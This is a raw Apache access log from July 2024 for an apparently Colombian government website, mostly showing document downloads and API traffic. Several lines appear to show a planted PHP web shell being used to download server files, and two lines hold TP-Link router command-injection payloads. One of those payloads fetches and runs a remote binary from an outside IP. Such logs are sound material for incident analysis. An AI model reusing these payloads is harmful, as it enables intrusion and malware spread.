186.154.35.60 - - [04/Jul/2024:07:59:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0897.pdf HTTP/1.1" 200 509328
47.128.125.0 - - [04/Jul/2024:07:59:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024&f=01663.pdf&ft=download HTTP/1.1" 200 20134
47.128.56.25 - - [04/Jul/2024:08:00:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page72.swf&ft=download&white=1 HTTP/1.1" 200 27435
201.245.192.253 - - [04/Jul/2024:08:00:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:00:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.71.79 - - [04/Jul/2024:08:01:01 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19wOIaHyzZp+q+0HY2GhmZuXr9o9xNk6SH7M0WXhYV6/gUoLB2q2nGJ&y=U2FsdGVkX1/BnsyFAr56HT+tVJMooa68gF8oHim5losyX3WhTtSa5lJ7CBaWR9YE HTTP/1.1" 200 30
186.102.71.79 - - [04/Jul/2024:08:01:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19ukujEgzDwnO35/8pJozMmaMkiY7Zso7RgkVUssXbxIBYtIDKuHFI+JevLREcbISBHkR/43NntiWF46ZmI8Zf5EfGiQvC7J/M=&u=U2FsdGVkX18g2/enZAad9myEL5N4UGpefI6TVQ6d0/k=&y=U2FsdGVkX1/BnsyFAr56HT+tVJMooa68gF8oHim5losyX3WhTtSa5lJ7CBaWR9YE HTTP/1.1" 200 97
186.102.71.79 - - [04/Jul/2024:08:01:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+M9Qyl017fU8nOFw7dWCb8OGagMj6WPGooKtEFO2KSurCGQF38abTRpT7kSpmkAQ+MLj+AN0mfcpGVnBBzDlB5nu6aBqhJyysHfZLY3jJsoDu1l1JRzOwzaKNzGvtEXOFh6uBLny4Zsptk3f7GTMgdkb3Nx/eJPl7ltLx8VcD7EN77RBcjCst+gwZeRwONC9FRrc4P+zF9pc72FitLyxnkTCRySRg6+g3PWJ17BoYKd8z/yuq/9VGy5PS2C3Y4kZxC77OtXRSl93m6Tv4EDdkMPO8ipOv3PbPnB8WSLvTcOpPzb3eQZW0GDddl/oxnJ/0kSKlPJWqHCGdkKjYXVf9sm5SkFJOlgpS47ZQRJiVdV4fuAcfEp4l3JbjBS1ROxx81O0edCIyAJ1areWSokKAG2EcReR6RsxlvHQ5WqJSqqab4NVcGu6qkhb6n0sp+PEM9PAXMsnOjF38X6wKI7+6V75MmuHUzaMCBCubBD86eFrCj5k+OEmASW1UDoBm/ENZq5rel7XM7IhYBe0cc1B5IU3cS/MWgkjm9U17PolqCkLXk/hNC7PHzB7nvo/b7tVsxcyXaD8NDtPZStza6NILSXVtUIm67zR921AZ9XVW9eVBlDNow6Es4CIzk4yYs8z1Hroh18aN1tC5hFMABkMWvCafBPzhfZwBPOiqPaNQUQLLaXowvT5ASkkjelzSNFH8VYNjDVvzB14y2TMP/ItT4Ifd1eHCJMnvo4QecCbfViXhKl33FEe+vVevFza9eH7zFoJUESUVnmqnUelYZby+UtIKKvR2t/kczqZlEw8iFv3YPoh4w0alJSboqWVDy4Hb08ItcUarEJdlZthyJtaShlZyxdsWxsjCfbz/1IFkwi6TGLixyHYqNm70u4TBaRN0mRo86SMUXL8WGgzBlhbjA1DciNKp/6W2hfjD2VvEAMCETQKtrJYL6wQD6AarpzDdNbCb51rnOh7yZ44IMGAgukr6Y9S45o+frw2XT9b7rYu3iqg0fb009V6rDwpu0sSFYqaRiYpV+kvu6aAHj6W53tatmHLOPVJHqJdCRzJQQaAeXXsiJb5Pe5pniuUO5svXRyG7qgEp67GFjrg9moIY2+75wkF/6qc60K1HiJ3COd1f1Ca7IdLklGUM1wbuCde6TlkV3Ye5bOGhKhJjHQqRBxJEdBsexeE0fZQL4d4F25wn2jQqzWyeL4l17Tt2oxozy+spj/UHzcybGYU9Ua4Mx5j4zEJueNAhZH4aZhsE5q9FJJv+e1vXcJoTzs6VlclZ3naOcEZI0x8B9UGSAMjRHkfx8WDk5VVIYKwWHXTFhNQYcWsT9ygJ4VQ5Zcke7bg4LssLGHqf3XMh1VF1it4zM0f6yrVrX7V8Y1FOc/RUM/YUD6+pX0Zj4tOo4Xtq/I/9opSjVwql2LxHtfLkYr+dM07gyLe0kOhOXJWGDTbgdA7Mn6pG0N9h0ia+GfUtrz4qdnWgq8l14eCR03HWE7Uu2crxpokt1sX24z76ZvEnl94OqMs9IBUH+DQA3WhgUqLe2djPqOikDGnIGJ9WapIEZsypx9vd426uXJfvl3tDnku1/b2dUP1h8GQ3WMHOQ29QZ778FcCAChLrTYz7Vnq1nl/26CJkDJYngOapggLbSlcz1NMNtNRGr8CM2Aejdfm9/i6uVGmMRlIRNhHuGURqTzbmzFoMgJ+kXe1xKNqxzYHn6YwwlCdMCt8f8ml9jSUJWA6VmhoG3dCL+GD7L6lAWD33NykH7rsk=&u=U2FsdGVkX18g2/enZAad9myEL5N4UGpefI6TVQ6d0/k=&y=U2FsdGVkX1/BnsyFAr56HT+tVJMooa68gF8oHim5losyX3WhTtSa5lJ7CBaWR9YE HTTP/1.1" 200 374
186.102.71.79 - - [04/Jul/2024:08:01:01 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Yuhp/ZuSjCwD55QFpp4Ud5f3JZZxKnvK3bWS2lcroj56kqqa4bcMjrp7nxFyEv3O3qCCCE9Y5O2O4gVzKad1O0urVFyApc8oYT5t88jQ9djvUSUpfJAL9MSAVwxD3tKf4XPWJ/4/u56p+jRgAFklgaKnlENKM+Feak/PInPvxSkqMpxGoDPbZYdzMhZo2z23djyXV8c9hytldIUu/GGTAzg627SFXv4Q4d92f+i41VhUzRl2LNpVUOJV0/TAl1KM7ugJhOgy7THVaEYvYWDEv5WOWQUYPHqXd0pocPIseOYbQsRMRMSKuJ43u651RUKDmzS3DRb077y3ThPj7Vp4GOFKVFuMtsvHknSpV0jeIteel+GuShX5nLqbuPD8bFvHHts8pDnXJw8XgE1oSiaLQutpM0bQFxjNK6Mt/kerJd/XL0xflvBj0ag/mmmaaY8nOJr7hr6vdgX/JoYkeYxCVHeh7dF+cZgntV1dwLoFBF1vQEVD0z0ecuLKxrYRv5Y9D53IHgtGl2eQvyZULmgkssBovaKwiiFp4pg5xZI8P132WSzlUA8bu3/5vmBeNbZO3L5oN11S5nxZefFDTzfBAvXQDmX67dUPUQ3+Z7/P0ebUdW6B8Ox689VdBOBjpnIaWXtr54NEotSw+GoxNTWqDotgORlg3Dh5pVC1Yh8I6NzWQOsDYzyKQFODlDdwis4oyaELHls5EKCa1hkPVfvt4HJ11ogtqvFB9dVtw+lZwo8PCU0g36Qrl&u=U2FsdGVkX18g2/enZAad9myEL5N4UGpefI6TVQ6d0/k=&y=U2FsdGVkX1/BnsyFAr56HT+tVJMooa68gF8oHim5losyX3WhTtSa5lJ7CBaWR9YE HTTP/1.1" 200 208
186.102.71.79 - - [04/Jul/2024:08:01:02 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19wOIaHyzZp+q+0HY2GhmZuXr9o9xNk6SH7M0WXhYV6/gUoLB2q2nGJ HTTP/1.1" 200 30244
157.55.39.11 - - [04/Jul/2024:08:01:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0733.pdf HTTP/1.1" 200 2250097
201.245.192.253 - - [04/Jul/2024:08:01:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.26.110 - - [04/Jul/2024:08:01:39 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+P3+c9Xe6WGDtW1MgmE9T4OGH1Uep8NcWoHc0vewS3zPUDJh6zEc+sqyP30s0f02+fObh/f122OkeewAaZ4tcsAQfu3Di26ZUlzaRt5olGcPARaoQ22V8p5h8frNUKUr4eP5ME84N1nVpZBmcuQDNoree7jlUNsRk=&u=U2FsdGVkX1+aFAKbvA2MNz2+JjUhVl6A2sLLgcKxPFPKbiyHsDUe46W829gPAwck&y=U2FsdGVkX19y6Bhi0H66OzgJ+dIg0K4pqeJSk2yfiRgpJGJkWVsH4X6DryfHQTs3 HTTP/1.1" 200 60
66.249.73.38 - - [04/Jul/2024:08:02:04 -0500] "GET /BLA/resoluciones/AUTOS%202014/0832.pdf HTTP/1.1" 200 309898
201.245.192.253 - - [04/Jul/2024:08:02:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [04/Jul/2024:08:02:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:02:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [04/Jul/2024:08:03:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.73.38 - - [04/Jul/2024:08:03:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202001-2050/00002005.tif HTTP/1.1" 200 46708
172.22.2.4 - - [04/Jul/2024:08:02:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:03:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:08:04:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:04:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:03:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
66.249.73.38 - - [04/Jul/2024:08:05:17 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202024/167.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Jul/2024:08:05:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.31.176 - - [04/Jul/2024:08:06:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-pop3.php&ft=download&white=1 HTTP/1.1" 200 20748
201.245.192.253 - - [04/Jul/2024:08:06:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.37.1 - - [04/Jul/2024:08:06:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024&f=00437.pdf&ft=download HTTP/1.1" 200 20133
157.55.39.57 - - [04/Jul/2024:08:06:26 -0500] "GET /BLA/resoluciones/AUTOS%202023/08881.pdf HTTP/1.1" 200 1270971
201.245.192.253 - - [04/Jul/2024:08:06:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.20.78 - - [04/Jul/2024:08:06:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cpdc&f=header.php&ft=download HTTP/1.1" 200 959
47.128.36.58 - - [04/Jul/2024:08:06:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150722-2127-61000.txt&ft=download&white=1 HTTP/1.1" 200 622
47.128.37.4 - - [04/Jul/2024:08:07:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2694.pdf&ft=download HTTP/1.1" 200 20135
216.245.221.92 - - [04/Jul/2024:08:07:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jul/2024:08:07:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:07:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [04/Jul/2024:08:07:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [04/Jul/2024:08:08:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [04/Jul/2024:08:08:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.125 - - [04/Jul/2024:08:08:52 -0500] "GET /Publicaciones/2024EE123223.pdf HTTP/1.1" 404 228
201.245.192.253 - - [04/Jul/2024:08:08:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [04/Jul/2024:08:09:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:08:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.37 - - [04/Jul/2024:08:10:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201651-1700/20021674.tif HTTP/1.1" 200 330156
201.245.192.253 - - [04/Jul/2024:08:10:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
45.148.10.174 - - [04/Jul/2024:08:10:17 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [04/Jul/2024:08:10:18 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [04/Jul/2024:08:10:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [04/Jul/2024:08:09:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
186.98.82.173 - - [04/Jul/2024:08:10:51 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.98.82.173 - - [04/Jul/2024:08:10:51 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.98.82.173 - - [04/Jul/2024:08:10:54 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.98.82.173 - - [04/Jul/2024:08:10:54 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.98.82.173 - - [04/Jul/2024:08:10:56 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.98.82.173 - - [04/Jul/2024:08:10:56 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.98.82.173 - - [04/Jul/2024:08:10:59 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.98.82.173 - - [04/Jul/2024:08:10:59 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.98.82.173 - - [04/Jul/2024:08:11:01 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
66.249.69.70 - - [04/Jul/2024:08:11:02 -0500] "GET /semana-bogota-reverdece-se-plantaron-200-nuevos-arboles-en-el-humedal-tingua-azul-bosa.html HTTP/1.1" 200 896
186.98.82.173 - - [04/Jul/2024:08:11:01 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.98.82.173 - - [04/Jul/2024:08:11:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18JG0A/gddlYrXOgjQ2GIK0hiZ5T48zBwbXRVGhW0Rb7DdxKDqWXcklqS69rjMNRfVEE9EQi9oHqC0G7GSkmJhAwj0HG8dH6y69conjZ+MGwechvKVDupUpf3teyjWqebtvhrJQui+ymdYStT0XNJuHn4L4MrfjIy9k8iQstcq0FyFZ6g5ygOfOmXPjzOCkgyWg2E45lP9RcBoJi1AWmyZ4IervV+LA4dnGCoUBQcdEWm8Apfm6GWB9GKORr2Y9HtvL+oAge7evuA==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18DvUQodLD0V9CLFDyufGj2nz/hGAJfUfIFvk/CK+IBP2UmZ56AFLptzdVFwpBuIOvwnINTDiw8VH5WIfxhUYdgDDQjuUzRJLcjGU1/WysCNou5rY40VQ5npxj4PxxiElMwwR+F3PHxFt05ZUML0L4DN1GfP4SbeKEuVaO2M3I2R2F1KiMQZmIJ+Js5zkopu1EsYv3ofqNPqXAUDXSns9HRMNZDN5q5ndTsQt+UKdbQuQkZos2ZE5kL7yndTzS8PnKV5oIicpVtVSiHGQpbTjzWUbxfH8Ev2oBY0VBUewYIrXVJcPoeRU6si7+7ndDMat+BzgqwpaNYE1fSudwSVV5+AykzqzqpmdqOMsMpbEtyPNB1FbRXR4GhawcvNBOsC38Xaz3tPj04jPkMEOrJ6WMRvEvpdPhv//4dVxNaYs4wgdzpqqL1u16c0SgQCtFfyD534JiudBYtmOTYlPtYH3rLthdSzgUfRS1MWqbdCOEVYRDxGio7peywNbdADQTrRFNohhZB3ZV99fAI8u6Fv9VNfFKU9Y8uSV+8XYfM3fmOZ8gDPRU0UC5ZKXvnHhKfBd/CkLdNM6hU/9jRrW1a3f99CSya8dUNFixQUM+icx6jrHJOgm81T40TVLzZo3nah6h1swD0FZ0+GFVj2qqeuE4D/pOp1IYaD27elyDzjsgAAKQB7tEF228q/ei6Y/dBbLPez7P4qqyAV6q3wlRLtk4GUy6wIHpBn60ins6rsBj5PkdX3DDr7XWwyqpZkA6BZS32VJiWu60/bpihlEhIwivy0dleS3ZNBFkyKYHKXDeTGWxVrfZO68hrpZ7/6yMn9e/r28IPTGdHpZGRld5NY8ZuGtav7xUN+AF4wv7qmAlTV82Y6YrkRwX6fxI57+CJrqMBj6UekFKQZdo5ukYzpi9W4asNlu4cxvEgMetF/B1MISOY7api+iEIoVC6cUVkyFyidn24oguLc+gJfYl0yE0XUZ4Ift8phKA4wQ2ZSQryjVE7iValdFpRcFVU/3UX8et3nH2PP8Hla3EjghGxtlbEAG9WEbdMamOWHSQNX9g6EB89+Z1HrZ7LkWN+9UQqbWSrDXuLxzZNOhwmHPxzCm9XBmz7c4m5YYebSf1Hya8wlnpPqq6mti47XZvq7LdkDYcJaxbcaXH5HpVkrPy5sIp0/vFQd0OuTnpZB+lktOEssA83QlX2RlMrrEjVgEfjU31099x9h2UVLKmGPe/u+pBjf6C2uxwwECDUM0m+LO8CbdrA4YTOoN8ykcuBihTfzVRndEXEWpVeDIVtqeTxo7IgE9wQdvPbtpKjHF9sI9/7qJYfhQShCsGBFRcoy66HroMG7+QuILFV5RBxjKrjaBl69di+3O2FoUvyMIABnJnMB0Jy6DMytZmDzB107CpBJXzJpJFisoqnEZzayvH6T48jOSNxvxjueClloCx9CRhwgj6uRXDaJW5c7PobiOrcuaWMI7OlobVpeXKDmn10xe6i8NBFJj2tlSI2DBDpmtf2dxsGIoO7v0/K&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19NE9IwUXywoDciu4pS7TvZ2OKGUsGzaiwaDgoWkr2g6yj1/7XiPaScqFao5SvywhDhqJebTdEqWD6TWglOQuk9bQEAYM/AmK9HAMzGhRqYhm2n/NOjgjdC5zj5ZlxQxJlwqNVWvXzLKZyBvwZJXkWNFsPOL0vGyxM=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+tjeSz2acN23GUjLTwnrfK7nvQc++XwnxKoatYLEh8mYPJnTMa3awX8joZ+vdNSaoD7AwlJMybBh0eTFJFZtKaCyWbhYQleTtiWUt5tEPys7/ombmKOJOtxMmZDoZ9oRKALED/iyltmNQPekmr2Izmjr2InG8cEDc=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19OaQUowGMRpS1War6cjYd7cdC12MnEJt4t8260L7CokEXVrW4IkCI+YLzuXjAPHFnZ5wi3dTDOKjlbHNBe8Qme9V93INFklW6gNM9IQZXRBbrncYZLx9mWPYVGU/AWJfa2DhpRpdSw3o9cuQQlQbffqP3yjdmWyaA=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:14 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX192jDFRg+jQhTgLGVABSYzFmcUhP3hXBHrO2wEtN37Wds73laqgXzKJlaIBKA0hL8J16DQ4GGJoJnSWpKXrdOqLaTU9jD+u14FnpIFw9E4C5bExZuGfbFnRaAXMsbXuEm+OY5cS0h5M1AxYOzG5hs09ePT1hh9EioFwFKxzhjANmthLd44waiGX2yHt7D5MYBT4zSUfQt1hQw==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:14 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19HL4ubi4R35+V2GJpMlBLVtrjNa8TXKkC48nix9xzgi1qTdZx0hDngkj2HkmaT8M0UYtwE6DCSY3jlx7byVOJxuIF2MFqjMjnrnbXjKcSGnq9ze453BIjBN/+tiwdQqGhtx5lAnn+PhBLnWKJmh3g6MydEf1c8Uxuwut3zy4Ayg9vuSpMjTcZtXh4w7AjKLHakq4CAafpZQaVe81Z8N1T1nLb2U2RK6CA=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:14 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19kRzQZTH8ZWFyQOqGGKzwGfAB1WFEKSZaVbyu60sa7k60dBL6spgjJNsCmP9VNRWiJnhNlagrMyOrOUAJTfPXei0/sppY73ZQst1eFHN1f6SoN6KDas2ulFRSKaEaTKPkhRabhb3w+cnVqvnA790oeMXvdQHlm+J5cVWrO8E+vZfYHivNsBgtdjFLd5wvgsiprqXOwHGB6zw==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Cy1Jw0duptrsvefX5367b1lIcR+tvOV9ddvroKS/HP7+X0CQQ8g0W99PgAT6xVYKZW71lV0dO7xn/BfgUpqWHyFiBqeeurxMIL//iav24CD+vUYmeH1elieSzR0dxkA5wEackYv/tAKjoE/SSQB8EkLyQ+gjl3Laj+hnjrHh0nwWNf3cXZr8n5w3XgOMckMn8PjlXLwyR0elYjeMBWl4U8TbTOqYgZu0=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+KIaNOFzUA0uOQdrUtWp3a8SMZHtmxIjxUHx2tZQeSdlO5Ea112Do/CUxqtq0hvc0lu7IOmGKXxS6S36zx2jKc3YNHmkl0OYbnrvS1CCvp5J78ZcGHpeKSFeiDsRNIUEpPSjpTv6kpgLn8nzG2qMfPaAlqvVnebtMqRUEiwTgoJCH+N/2Vq8yA6eciXXOA3q/iycrWHBl0+A==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+4mgbK7AyIa4CjRswCzTyhLf7x9dlAUrCjRXKqAuSIsg3hNtaaGsY65pPb3b7gb7x7K22A4uaiz8FNlZ+6lCNVrmwUJk992f4XmgLb9Eu6PJ8m7GYZDysN4sv0C9MxIyjdGW3b0LbE3Q3hPhip7vjlucoK0rIT65MiErEKcJmqLR/jfZoX+Vxz+pNGtPODHGHyDzBMeHBBW0F5XNWQQDSozhGtXpfb++E=&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
186.98.82.173 - - [04/Jul/2024:08:11:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/XwLUyg1kt8SraQpZyBPa/kHgFOFD/bkENOuiixBywkJRBmoNbyF59WEEPMeFXxvb5QELyocELLljUb3cI3uGgM8g05ybXjSSt9UZesopyFOMUN/wNDIYA0Eru0dBOwrKhr8n33PrpnBjLiPAxqqisQpVQ7pto8hoizGRbrJy+J+L2Hj2Vn9RXncJ+Z31z3cdeMroSCvIsDA==&u=U2FsdGVkX18GSSV01cDUhGUNSzfdXWDG+OwZTwgfvRh8eZWmTs0LQYMsA6c1Y+5G&y=U2FsdGVkX1+YcoNpYgvsCzbumZ3FJ368VPJJMnj7GtMddJd8+Wyh2atgm4nMKA9r HTTP/1.1" 200 26
